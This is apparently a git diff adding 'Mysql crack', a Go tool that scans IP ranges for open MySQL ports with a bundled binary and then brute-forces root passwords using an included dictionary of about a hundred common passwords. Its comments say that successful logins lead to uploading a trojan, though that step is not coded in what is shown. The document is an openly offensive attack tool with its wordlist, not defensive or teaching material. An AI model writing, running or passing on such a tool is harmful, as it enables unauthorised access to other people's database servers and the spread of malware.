zhangqin
diff --git a/‎1.go‎
Lines changed: 147 additions & 0 deletions b/‎1.go‎
Lines changed: 147 additions & 0 deletions
diff --git a/‎mysqlfuzz.exe‎
3.74 MB b/‎mysqlfuzz.exe‎
3.74 MB
diff --git a/‎pass.txt‎
Lines changed: 102 additions & 0 deletions b/‎pass.txt‎
Lines changed: 102 additions & 0 deletions
diff --git a/‎s.exe‎
7.77 KB b/‎s.exe‎
7.77 KB
@@ -0,0 +1,147 @@
+package main
+
+import (
+	"fmt"
+	"github.com/ziutek/mymysql/mysql"
+	_ "github.com/ziutek/mymysql/native" // Native engine
+	"os"
+	"os/exec"
+	"time"
+	"C"
+	"io/ioutil"
+	"strings"
+	"runtime"
+	"sync"
+)
+
+type ScanMysql struct {
+	dist []string
+	result map[string]string
+}
+
+//ScanPort
+func (self *ScanMysql) ScanPort(startip, endip, port, thread string) {
+	cmd := exec.Command(`s.exe`, `tcp`, startip, endip, port, thread, "/save")
+	cmd.Stdout = os.Stdout
+	if err := cmd.Run(); err != nil {
+		fmt.Println("Error: ", err)
+	}
+	cmd.Run()
+	fmt.Println("Scan success..")
+}
+
+func (slef *ScanMysql) crack(host, user, pass, port, dbname string) (bool, *mysql.Conn) {
+	db := mysql.New("tcp", "", host+":"+port, user, pass, dbname)
+	db.SetTimeout(4 * time.Second)
+	err := db.Connect()
+	if err != nil {
+		db.Close()
+		return false, nil
+	}
+	return true, &db
+}
+func (slef *ScanMysql) Attack(iparr []string){
+	list := slef.dist
+	var ip string
+	ch := make(chan int)
+	for _,ip = range(iparr){
+		go slef.run(list,ip,ch)
+	}
+	<-ch
+}
+
+func (slef *ScanMysql)run(list []string,ip string,ch chan int) {
+	var pass string
+	wg := sync.WaitGroup{}
+	for _,pass = range(list){
+		wg.Add(1)
+		go slef.run2(pass,ip,&wg)	
+	}
+	wg.Wait()
+	ch<-1
+	
+}
+
+func (slef *ScanMysql)run2(pass,ip string,wg *sync.WaitGroup){
+	pass = strings.TrimSpace(pass)
+	ip = strings.TrimSpace(ip)
+	is_login,_ := slef.crack(ip,"root",pass,"3306","mysql")
+	fmt.Printf("\r\nCracking: %s  root-%s",ip,pass)
+	//爆破成功，上传木马执行
+	if is_login{
+		fmt.Println("  爆破成功，正在上传木马....\r\n")
+		slef.result[ip] = pass
+//		wg.Done()
+//		os.Exit(2)
+	} else {
+		fmt.Println("  连接失败\r\n")
+	}
+	wg.Done()
+}
+
+func ( *ScanMysql) ipformat()[]string {
+	f,err:= os.Open("Result.txt")
+	if err !=nil{
+		fmt.Println(err)
+	}
+	res,err := ioutil.ReadAll(f)
+	if err !=nil{
+		fmt.Println(err)
+	}
+	str := string(res)
+	arr := strings.Split(str,"\r\n")
+	l := len(arr)-4
+	arrs := arr[2:l]
+	var newarr []string
+	for _,v := range(arrs){
+		v = strings.Replace(v,"    3306  Open             ","",-1)
+//		fmt.Println(i,v)
+		newarr = append(newarr,v)	
+	}
+	f.Close()
+	os.Remove("Result.txt")
+	return newarr
+}
+
+func main() {
+	runtime.GOMAXPROCS(runtime.NumCPU())
+	fmt.Printf("\r\n------------------------------------------------------------------------------\r\n")
+	fmt.Printf(" Welcome to use Mysql crack!                                     qq:1141056911\r\n")
+	fmt.Printf("                                                                       By Lcy \r\n")
+	fmt.Printf("                                                            http://phpinfo.me \r\n")
+	fmt.Printf("------------------------------------------------------------------------------\r\n")
+	if len(os.Args) != 4 {
+		fmt.Printf("Usage: %s StartIP EndIP ThreadNumber", os.Args[0])
+		os.Exit(1)
+	}
+	StartIP := os.Args[1]
+	EndIP := os.Args[2]
+	Thread := os.Args[3]
+	fmt.Printf("Scaning to %s-%s\r\n",StartIP,EndIP)
+	time.Sleep(1 * time.Second)
+	//初始化mysql对像
+	obj := ScanMysql{}
+	obj.ScanPort(StartIP, EndIP, "3306", Thread)
+	//开放3306端口的ip
+	iparr := obj.ipformat()
+	//读取字典文件
+	f,err:= os.Open("pass.txt")
+	if err !=nil{
+		fmt.Println(err)
+	}
+	res,err := ioutil.ReadAll(f)
+	if err !=nil{
+		fmt.Println(err)
+	}
+	str := string(res)
+	obj.dist = strings.Split(str,"\r\n")
+	fmt.Printf("\r\nIP段扫描完毕，程序即将开始爆破密码...\r\n")
+	time.Sleep(1 * time.Second)
+	//启动线程开始爆破,爆破成功则自动上传木马
+	obj.result = make(map[string]string)
+	obj.Attack(iparr)
+	//爆破结果
+	for k,v := range(obj.result) {
+		fmt.Printf("爆破成功: %s root-%s\r\n ",k,v)
+	}
+}
@@ -0,0 +1,102 @@
+
+123456
+a123456
+123456a
+5201314
+111111
+woaini1314
+qq123456
+123123
+000000
+1qaz2wsx
+1q2w3e4r
+qwe123
+7758521
+123qwe
+a123123
+123456aa
+woaini520
+woaini
+100200
+1314520
+woaini123
+123321
+q123456
+123456789
+123456789a
+5211314
+asd123
+a123456789
+z123456
+asd123456
+a5201314
+aa123456
+zhang123
+aptx4869
+123123a
+1q2w3e4r5t
+1qazxsw2
+5201314a
+1q2w3e
+aini1314
+31415926
+q1w2e3r4
+123456qq
+woaini521
+1234qwer
+a111111
+520520
+iloveyou
+abc123
+110110
+111111a
+123456abc
+w123456
+7758258
+123qweasd
+159753
+qwer1234
+a000000
+qq123123
+zxc123
+123654
+abc123456
+123456q
+qq5201314
+12345678
+000000a
+456852
+as123456
+1314521
+112233
+521521
+qazwsx123
+zxc123456
+abcd1234
+asdasd
+666666
+love1314
+QAZ123
+aaa123
+q1w2e3
+aaaaaa
+a123321
+123000
+11111111
+12qwaszx
+5845201314
+s123456
+nihao123
+caonima123
+zxcvbnm123
+wang123
+159357
+1A2B3C4D
+asdasd123
+584520
+753951
+123
+147258
+1123581321
+110120
+qq1314520